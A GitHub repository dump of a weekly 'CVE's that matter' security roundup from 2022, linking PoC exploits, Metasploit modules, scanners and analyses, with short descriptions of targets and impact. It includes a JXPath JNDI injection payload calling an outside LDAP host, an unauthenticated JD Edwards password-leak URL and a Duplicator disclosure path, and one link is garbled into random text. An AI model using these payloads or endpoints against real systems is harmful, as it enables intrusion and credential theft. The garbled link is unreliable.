The vulnerability can be exploited by an attacker to obtain the username and password in clear text.\n           \n - [CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)\n           \n      - Target/Product : **Open Web Analytics (OWA)**\n      - Affected Version : < 1.7.4.\n      - Description/Issue : Exploit for the unauthenticated RCE in Open Web Analytics (OWA) < 1.7.4. This work is based on https://devel0pment.de/?p=2494.\n\n\n - [CVE-2022-1802 + CVE-2022-1529 + CVE-2022-2200](https://github.com/mistymntncop/CVE-2022-1802)\n           \n      - Tested: **Firefox 100.0.1**\n      - Description/Issue : Firefox 100.0.1 RCE via prototype pollution: an attacker could set undesired attributes on a JavaScript object's prototype, leading to privileged code execution.\n\n - [CVE-2022-35406 Writeup](https://medium.com/@mr.vrushabh/discovery-of-cve-2022-35406-303f4bca2742)\n      - Description/Issue : @mr.vrushabh found CVE-2022-35406 in PortSwigger's Burp Suite. It was a bug in Repeater/Intruder whereby a meta redirect would be followed when the user clicked the "follow redirection" button regardless of the Content-Type or Content-Disposition headers used on the target web site. This could disclose the Referer header. It was considered a low-severity issue because the attack scenario involved multiple unlikely steps requiring user interaction. \n\n - Week 35 of the Advisory Week newsletter. 
You'll see updates on [security fixes from Apple, Microsoft, GitHub, Red Hat, Ubuntu, Mozilla and the National Cyber Awareness System](https://advisoryweek.com/).\n\n</details>\n---\n<details>\n<summary><b> \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 23rd - 30th August 2022\n\n \n      CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250 Linux kernel LPE, \n                        CVE-2022-22715, CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n      \n      CVE Analysis :    CVE-2022-20233, multiple CVEs in Tenda, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n                        CVE-2020-2733 and CVE-2022-30129. \n\n</b></summary> \n \n - [CVE-2022-32250 Exploit](https://github.com/theori-io/CVE-2022-32250-exploit)\n    - Target: **Linux kernel**\n    - Affected Version: Linux before commit 520778042ccca019f3ffa136dd0ca565c486cedd (26 May 2022) & Ubuntu <= 22.04 before the security patch.\n    \n    - Description : CVE-2022-32250 allows a local user to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check in nf_tables leads to a use-after-free (UAF). \n\n- [N-day exploit for CVE-2022-2586 - Analysis](https://www.openwall.com/lists/oss-security/2022/08/29/5)\n   - Target/Product: **Linux kernel nft_object UAF**\n   - Affected since : v3.16-rc1\n   \n   - Description : The vulnerability is a use-after-free (UAF) in nf_tables that makes it possible to escalate privileges from any user to root, and it has been present since kernel version v3.16-rc1. 
To exploit this bug we need to enter a new network namespace to obtain `CAP_NET_ADMIN` (i.e. unprivileged user namespaces must be enabled, which is the case on most Linux distributions nowadays).\n\n - [CVE-2022-22715 POC](https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2022-22715)\n    - Target: **Windows OS**\n    - Description : In February 2022, Microsoft patched the vulnerability k0keoyo used in TianfuCup 2021 for escaping the Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in the Named Pipe File System for nearly 10 years, since the AppContainer was born. We called it \"Windows Dirty Pipe\".\n    - Root Cause : The vulnerability existed in the Named Pipe File System Driver - npfs.sys, and the issue function is npfs!NpTranslateContainerLocalAlias. When we invoke NtCreateFile with a named pipe path, it hits the IRP_MJ_CREATE major function of npfs, which calls NpFsdCreate.\n\n - [CVE-2022-20233 Analysis](https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html)\n    - Product: **Titan M - A security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3.**\n    - Patched : Pixel Security update of June 2022.\n    \n    - Description/Issue : On 2022-08-11, Google awarded Quarkslab's engineers Damiano Melotti and Maxime Rossi Bellom $75,000, and they presented their Titan M vulnerability research project at the Black Hat USA 2022 Briefings in Las Vegas. You can also check out this week's Tools section for finding vulnerabilities on Titan M.\n\n - [Multiple CVE in TENDA](https://github.com/Darry-lang1/vuln/tree/main/Tenda/AC1206/4)\n    - Product: **Tenda AC1206 Router**\n    - Affected Version : V15.03.06.23\n    \n    - Description/Issue : Recently, multiple CVEs have been assigned for the Tenda AC1206. 
CVEs to check out: CVE-2022-37798, CVE-2022-37799, CVE-2022-37800, CVE-2022-37801, CVE-2022-37802, CVE-2022-37803, CVE-2022-37804, CVE-2022-37805, CVE-2022-37806 & CVE-2022-37807.\n\n - [CVE-2022-24787 Report analysis](https://securitylab.github.com/advisories/GHSL-2022-001_Orckestra_C1_CMS/)\n    - Target/Product: **Orckestra C1 CMS - Content Management System that scales out in the cloud.**\n    - Version: v6.11\n    \n    - Description : @JarLob (Jaroslav Lobacevski) reported an issue highlighting \"Deserialization of untrusted data (GHSL-2022-001) allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.\"\n \n  - [CVE-2022-38766 POC]\n    - Target/Product: **Renault 2021 ZOE Electric car**\n    \n    - Description/Issue : This vulnerability raised the question of whether ZOE electric vehicles are safe from RF hacking. For this reason, the actual ZOE vehicle released this year was targeted and attacked. A study was also conducted on how this attack bypasses the rolling codes, a defense technique against RF hacking, and a lot of thought was needed about the handling method in case the car breaks down.\n \n - [CVE-2022-37042 POC Exploit](https://github.com/aels/CVE-2022-37042)\n    - Target: **Zimbra**\n    - Description : Zimbra CVE-2022-37042 Nuclei weaponized template shell path: /public/formatter.jsp\n    \n  - [CVE-2022-23779 Proof-of-Concept Exploit](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n    - Target: **ZOHO**\n    - Description : Internal Hostname Disclosure Vulnerability\n\n - [CVE-2022-33318 - Remote Code Execution in ICONICS Genesis64](https://github.com/0vercl0k/paracosme)\n    - Target: **Genesis64 suite**\n    - Version: 10.97.1\n    \n    - Description : Paracosme (Remote Code Execution in ICONICS Genesis64 exploit) was demonstrated during the Pwn2Own 2022 Miami contest that took place at the S4x22 Conference. 
Paracosme exploits a use-after-free issue found in the GenBroker64 process to achieve remote code execution on a Windows 21H2 x64 system. At a high level, the GenBroker64 process listens on TCP port 38080 and is able to deserialize various packets after a handshake has been done with a client. The issue I found is in the code that handles reading a VARIANT from the network socket. Basically a variant is a type and a value. The function seems well-written at first sight, and takes efforts to only unpack certain types. \n    \n\n - [CVE-2022-2884](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/)\n    - Target: **GitLab**\n    - Version: 15.3.1, 15.2.3, 15.1.5\n    \n    - Description : There is a critical vulnerability with the identifier CVE-2022-2884 and a score of 9.9 in versions 11.3.4 to 15.1.4 and between 15.2 and 15.2.3, as well as 15.3 community and enterprise versions, which allows an attacker to execute code remotely. This vulnerability occurs in GitHub import.\n\n\n - [CVE - 2022-LPE-UAF](https://github.com/greek0x0/2022-LPE-UAF)\n    - Target: **Linux kernel**\n    \n    - Description : Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. 
[Paper on DirtyCred by Zhenpeng](https://zplin.me/papers/DirtyCred-Zhenpeng.pdf)\n\n\n - [CVE-2022-26377 Analysis](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)\n    - Target: **Apache HTTPd**\n    - Title : apache-httpd-ajp-request-smuggling\n    \n    - Description : This article introduces a new attack method and idea for AJP. It applies to the attack surface of the Apache HTTPd proxy_ajp reverse proxy for Tomcat AJP and to self-developed AJP reverse proxies, and the horizontal extension to FastCGI and other protocols can also be attempted (though no other protocols have been dug into yet). \n\n - [CVE-2020-2733 Analysis](https://redrays.io/cve-2020-2733-jd-edwards/)\n    - Product: **Oracle JD Edwards EnterpriseOne Tools**\n    - Affected Version : < 9.2\n    \n    - Description/Issue : The vulnerability was discovered in the Oracle JD Edwards Management portal. To reproduce the vulnerability, you need to open (without authentication) the following [URL](http://JDEdwards:8999/manage/fileDownloader?sec=1). When you open the URL, you can see pseudo-random text in the page: ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB. After analyzing the JD Edwards jar files, the researcher discovered that this pseudo-random data is THE ENCRYPTED ADMIN PASSWORD!\n\n - [CVE-2022-30129 - Analysis](https://blog.sonarsource.com/securing-developer-tools-argument-injection-in-vscode/)\n    - Target/Product: **Microsoft Visual Studio Code**\n    - Affected Version : 1.67.1\n    \n    - Description/Issue : Argument Injection in Visual Studio Code : The vulnerability can be used to target developers that have the Visual Studio Code IDE installed. Upon clicking on a malicious link crafted by an attacker, victims are prompted to clone a Git repository in Visual Studio Code. 
\n\n</details>\n--- \n<details>\n<summary><b> \nCVE's that matter Week 03 -> 16th - 22nd Aug 2022 \n</b></summary>\n\n- [CVE-2022-1802 POC Exploit](https://github.com/mistymntncop/CVE-2022-1802)\n    - Target: **Amazon-Linux 2 : thunderbird Package**\n    - Version Affected: <0:91.9.1-1.amzn2.0.1 \n    - Description : The Mozilla Foundation Security Advisory describes this flaw as:\n     An attacker could have sent a message to the parent process where the contents were used to double-index into a JavaScript object, leading to prototype pollution and ultimately attacker-controlled JavaScript executing in the privileged parent process. (CVE-2022-1529).\n\n- [CVE-2022-35742](https://blog.78researchlab.com/b9c80d00-d935-43b1-8805-969000df301d)\n    - Target: **Windows Outlook**\n    - Patched on August 2022\n    - Description : Denial of service in Outlook, where an attacker can trigger the vulnerability by sending a crafted email; the vulnerability occurs during MIME property parsing.\n\n - [CVE-2021-43811 POC](https://github.com/s-index/CVE-2021-43811)\n    - Target: **awslabs/sockeye**\n    - Version: < 2.3.24 \n    - Description : Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. 
The issue is fixed in version 2.3.24.\n\n- [CVE-2020-6369 Patch bypass](https://redrays.io/cve-2020-6369-patch-bypass/)\n    - Target: **CA Introscope Enterprise Manager**\n    - Version Affected :\n                        WILY_INTRO_ENTERPRISE 9.7\n                        WILY_INTRO_ENTERPRISE 10.1\n                        WILY_INTRO_ENTERPRISE 10.5\n                        WILY_INTRO_ENTERPRISE 10.7\n    - Description : CA Introscope Enterprise Manager releases 10.7.0.306 or lower allow unauthenticated attackers to bypass the authentication if the administrator has not changed the default passwords for Admin and Guest. This may impact the confidentiality of the service.\n\n - [CVE-2022-36966]\n    - Target: **Orion platform**\n    - Description : CVE-2022-36966 has been assigned as the Zero-Day for the escalation of privilege in the Orion platform. The exploit requires internal + initial access. Details will be shared as SolarWinds provides official feedback. The vulnerability was identified by researcher 'Asim Khan'\n\n\n - [1day to 0day (CVE-2022-30024) on TP-Link TL-WR841N](https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/)\n    - Target: **TP-Link TL-WR841N devices**\n    - Description : Vulnerabilities on TP-Link TL-WR841N devices: CVE-2020-8423 (data parsing), CVE-2022-24355 (file extensions handling) & CVE-2022-30024 (assignment data)\n\n\n - [CVE-2022-27255 POC](https://github.com/infobyte/cve-2022-27255/tree/main/exploits_nexxt)\n    - Target: **Realtek eCos SDK SIP ALG buffer overflow**\n    - Vulnerable Devices : \n               \n               Nexxt Nebula 300 Plus\n               Tenda F6 V5.0\n               Tenda F3 V3\n               Tenda F9 V2.0\n               Tenda AC5 V3.0\n               Tenda AC6 V5.0\n               Tenda AC7 V4.0\n               Tenda A9 V3\n               Tenda AC8 V2.0\n               Tenda AC10 V3\n               Tenda AC11 V2.0\n               Tenda FH456 V2.0\n               Zyxel NBG6615 V1.00\n 
              Intelbras RF 301K V1.1.15\n               Multilaser AC1200 RE018\n               iBall 300M-MIMO (iB-WRB303N)\n               Brostrend AC1200 extender\n               MT-Link MT-WR850N\n               MT-Link MT-WR950N\n               Everest EWR-301\n               D-Link DIR-822 h/w version B\n               Speedefy K4\n               Ultra-Link Wireless N300 Universal Range Extender\n               Keo KLR 301\n               QPCOM QP-WR347N\n               NEXT 504N\n               Nisuta NS-WIR303N (probably V2)\n               Rockspace AC2100 Dual Band Wi-Fi Range Extender\n               KNUP KP-R04\n               Hikvision DS-3WR12-E\n\n    - Description : PoC and exploit code. The PoC should work on every affected router; however, the exploit code is specific to the Nexxt Nebula 300 Plus router. For more - https://github.com/infobyte/cve-2022-27255\n\n\n - [CVE-2022-37393 Technical Analysis](https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis)\n    - Target: **Zimbra Collaboration Suite**\n    - Description : We are not aware of active exploitation of CVE-2022-37393 at this time, but it could be very difficult to detect successful exploitation because it grants root access.\n\n\n - [CVE-2022-21881 POC](https://github.com/theabysslabs/CVE-2022-21881)\n    - Target: **TianfuCup 2021**\n    - Description : POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape the Chrome Sandbox \n\n - [CVE-2022-29805 Analysis](https://www.whiteoaksecurity.com/blog/fishbowl-disclosure-cve-2022-29805/)\n    - Target: **Fishbowl**\n    - Version: <2022.4.1.\n    - Description : White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. 
\n        \n - [CVE-2022-37042 Zimbra Authentication Bypass](https://github.com/projectdiscovery/nuclei-templates/pull/5134/files)\n    - Target: **Zimbra**\n    - Description : Nuclei Zimbra: Release of the CVE-2022-37042 Zimbra Authentication Bypass Causing RCE non-destructive vulnerability detection template.\n \n</details>\n---\n<details>\n<summary><b> \nCVE's that matter Week 02 -> 9 - 16 Aug 2022\n</b></summary>\n\n - [CVE-2022-27255](https://github.com/infobyte/cve-2022-27255)\n    - Target: **Realtek eCos SDK SIP ALG buffer overflow.**\n    - Description : This repository contains the materials for the talk \"Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.\", which was presented at DEFCON30.\n\n  - [CVE-2022-30216]()\n    - Target: **Windows Server service**\n    - Version: Windows 11/Server 2022 machine.\n    - Description : PoC of the srvsvc auth coerce vulnerability [(CVE-2022-30216) : Authentication coercion of the Windows “Server” service.](https://www.akamai.com/blog/security/authentication-coercion-windows-server-service)\n\n\n  - [CVE-2022-36446 POC](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)\n    - Target: **Webmin**\n    - Version: < 1.997. \n    - Description : A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin.\n\n - [DashOverright POC]()\n    - Target: **VMware vRealize Operations Manager**\n    - Version : <= 8.6.3.19682901. \n    - Description : This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901. 
\n                    This exploit chains three vulnerabilities that have been patched.\n                    CVE-2022-31675 - MainPortalFilter ui Authentication Bypass\n                    CVE-2022-31674 - SupportLogAction Information Disclosure\n                    CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation\n\n - [CVE-2021-43908 Analysis](https://blog.electrovolt.io/posts/vscode-rce/)\n    - Target: **Visual Studio Code**\n    - Description: Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908)\n \n - [CVE-2022-31101 POC](https://github.com/karthikuj/CVE-2022-31101)\n    - Target: **PrestaShop** is the universal open-source software platform to build your e-commerce solution. \n    - Description: Exploit for PrestaShop blockwishlist module 2.1.0 SQLi \n\n - [CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)\n   - Target: **Apache Commons**\n   - Version: \t2.2.4 to 2.7-2\n   - Description: Apache Commons RCE; the url, dns and script keywords can be used to connect to any server.\n\n - Microsoft security updates that matter :                                        \n   - [CVE-2022-34715 POC](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715) - Description: Windows Network File System Remote Code Execution Vulnerability.\n   - [CVE-2022-30133](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133) - Description: Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (Disable port 1723)\n   - [CVE-2022-34713](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713) - Description: 0-day DogWalk - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\n - [CVE-2020-0796](https://github.com/msuiche/smbaloo)\n    - Target: **Windows ARM64**\n    - Description: A CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows 10 18362 ARM 64-bit (AArch64)\n    \n- [Vulnerabilities in Cisco Small Business 
products](https://pastebin.com/8w2VVXn2)\n   - CVE-2022-20842 \n   - CVE-2022-20827 \n   - CVE-2022-20841\n\n- [Multiple Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software have not been FIXED](https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/)\n   - Cisco ASDM binary packages  \t\n     - CVE-2022-20829 \tNot fixed**  \n     - None (CVE not assigned yet) \tNot fixed\n   - Cisco ASDM (7.17.1.155). \t\n     - CVE-2022-20651 \tFixed\n   - Cisco ASDM client (fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed). \n     - CVE-2021-1585 CSCvw79912 \tNot fixed**\n   - Cisco ASDM binary package code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585. \t    \n     - CSCwc21296 \tFixed\n   - Cisco ASA-X with FirePOWER Services \n     - CVE-2022-20828 \tFixed in most maintained versions\n   - Cisco FirePOWER module before 6.6.0  \t\n     - CSCvo79327 \tFixed in most maintained versions\n     - >= 7.0. 
Not fixed on ASA.\n   - Cisco ASA with FirePOWER Services \n      - None \tNot fixed\n   - Some Cisco FirePOWER modules\n      - None \tNot fixed\n\n </details>\n---\n<details>\n<summary><b> \nCVE's that matter Week 01 -> 2 - 9 Aug 2022\n</b></summary>\n\n - [CVE-2022-36446 Exploit](https://www.exploit-db.com/exploits/50998)\n    - Target: **Webmin**\n    - Version: 1.996\n    - Description: [Remote Code Execution (RCE) Authenticated During Install New Packages.](https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165)\n  \n  - [CVE-2022-2552 Exploit](https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552)\n    - Target: **WordPress Plugin Duplicator**\n    - Version: <=1.4.7\n    - Description : Unauthenticated System Information Disclosure \n    - #Proof-Of-Concept: 1-System information.\n                         Some system information is obtained using the \"view\" parameter.\n                         http://[PATH]/backups-dup-lite/dup-installer/main.installer.php\n \n  - [**CVE-2022-29582-io-uring** - a vulnerability in the io_uring subsystem of the Linux kernel](https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/)\n  \n  - [**CVE-2022-35405 Zoho** Password Manager Pro XML-RPC RCE](https://xz-aliyun-com.translate.goog/t/11578?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n\n  - [**CVE-2022-1215 - Analysis**](https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html)\n    - Target: **libinput library**\n    - Version: < 1.20.0\n    - Description: n-day exploit - A format string vulnerability exists in the libinput library, \n    allowing a local attacker to achieve arbitrary code execution in the context of libinput.\n\n- [CVE-2022-34918 LPE POC](https://github.com/veritas501/CVE-2022-34918)\n  - Target: *Linux kernel module* (4 Aug 2022) \n  - Version span: v5.8 ~ v5.19 \n  - Description: netfilter nf_tables local privilege escalation analysis \n  \n - [Multiple CVEs on multiple VMware products and a critical (9.8) 
CVE-2022-31656](https://www.vmware.com/security/advisories/VMSA-2022-0021.html)\n   - Target: **VMware**\n   - Version: 21.08.0.1, 21.08.0.0\n   - Description: VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.\n  \n- [nex-forms-exploit](https://github.com/ehtec/nex-forms-exploit)\n  - Target: *WordPress plugin* (2nd August 2022)\n  - Versions: <= 7.9.6\n  - Description: Authenticated SQL injection vulnerability in the \"NEX Forms\" WordPress plugin.\n \n- [CVE-2022-2185](https://github.com/star-sg/CVE/tree/master/CVE-2022-2185)\n  - Target: **GitLab**\n  - Version: GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1\n  - Exploit Written By: [Nguyễn Tiến Giang](https://github.com/testanull)\n\n </details>\n"
  },
  {
    "path": "ResetCybersecuirty/CVE's/POC_collecctions.md",
    "content": "- SkyLink\n- Red Teaming TTPs // Developing a POC for CVE-2022-26923 with Powershell and CommandoVM - https://youtu.be/z86tfhMU_vU\n- K8 Exploit Collections - https://github.com/k8gege/K8tools\n\n\n"
  },
  {
    "path": "ResetCybersecuirty/CVE's/Readme.md",
    "content": "# Security Patched, CVE : PoC, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md\" /> </p>\n<details>\n <summary><b>  \nA collection of the latest proof-of-concept exploit scripts and analyses of recently patched CVEs. \n  \n  > Why, you ask? Because tens of thousands of vulnerabilities are disclosed each year. Only a handful of them will ever be exploited, and those are the ones that leave you and your organization exposed to the latest vulnerabilities. \n  \n  \n  - Every week our team filters out the latest IT security CVE PoCs, updates on patched security issues, and writeups & analyses of CVEs that have been discovered, written or found by community members. The format we follow : \n  \n</b></summary>\n\n        \n        # Security Patched within a Week:   Latest IT security vulnerabilities patched this week by selected companies such as Apple, Google, etc.:\n        # CVE Analysis:                     CVE analyses and PoCs used for analysis.\n        # PoC Exploit :                     Tracking the recently discovered PoCs of old & new CVEs. 
\n        \n        - [CVE]\n           - Target/Product: ** **\n           - Affected Version/ Patched :\n           - Description/Issue/Flaw :\n        \n</details>\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 25th October - 01st November 2022.\n\n \n      Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022),                                      \n                                      featuring releases from Mozilla, Microsoft, Node.js, GitHub, Cisco, Linux (Ubuntu 22.04, 20.04 & 18.04 LTS) etc.\n        \n      CVE:ANALYSIS & POC:             CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969                                                \n                                      CVE-2022-3236 & CVE-2022-36966. \n\n         \n      CVE POC (0-Day):                7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits,                                                                     \n                                      CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422 (Google Chrome).\n                                    \n<details>\n<summary>\n🔧Security patched within a week:🔧\n \n  > AdvisoryWeek tracks the latest Security Advisories of top vendors and filters out high and critical vulnerabilities that have been patched within a week.\n</summary>\n \n- *Here’s a look at the latest security fixes (Severity : Critical or High) patched by top vendors in the past week. If you're using an old version of any of the mentioned vendors' products, avoid getting tricked into opening a specially crafted website in a browsing context, which an attacker could potentially exploit, so we highly recommend **upgrading or updating vendor products from the original source.***\n  >  
[2022-43 - Apple, Canonical, Red Hat, nodejs, Cisco, Microsoft, GitHub.pdf](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/files/9914437/Gmail.-.2022-43.-.Apple.Canonical.Red.Hat.nodejs.Cisco.Microsoft.GitHub.pdf)\n\n</details>\n\n<details>\n<summary>\n📝CVE analysis, writeups & reports: (6 CVE analyses this week)📝\n \n > Every week, we collect the recently discovered writeups & reports for CVEs.  \n</summary>\n \n  - [Analysis: CVE-2022-40684 technical-deep-dive-cve-2022-40684/)\n   \n     - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n     - [CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner) : New*\n     - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n     - [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)\n     - [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&page=1&indices=)\n\n     - Vendor : **Fortinet FortiGate**\n     - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n     - Patched : Apply updates per vendor instructions.\n     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS, FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n                          \n              \n   - [Analysis : Exploitation of Zimbra 0Day CVE 2022-41352](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/)                   \n                                     \n       - Target/Product: **Zimbra**\n       - Description/Issue/Flaw : The vulnerability 
affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.\n \n   - [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n        - [PoC CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)\n        - Payload : [jxPathContext.getValue(\"javax.naming.InitialContext.doLookup(\\\"ldap://check.dnslog.cn/obj\\\")\");]\n        - Target : **Apache Commons JXPath**\n        - Description : This vulnerability affects the Java library Apache Commons JXPath, which is used for processing XPath syntax. All versions (including the latest version) are affected by this vulnerability. 
\n                                    \n   - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)                                         \n       - [Analysis: Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)\n       - [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)\n       - [Tool : CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/text4shell-tools)\n       - [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)\n \n       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.\n       - Solution : Upgrade to Apache Commons Text 1.10.0.\n       - Description/Issue/Flaw : CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series, and is referenced as CVE-2022-42889. 
Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.\n         \n   - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) \n \n       - Target/Product: **Microsoft** \n       - Description/Issue/Flaw : An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n \n   - [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)\n \n       - Target/Product: **SOPHOS**\n       - Description/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. 
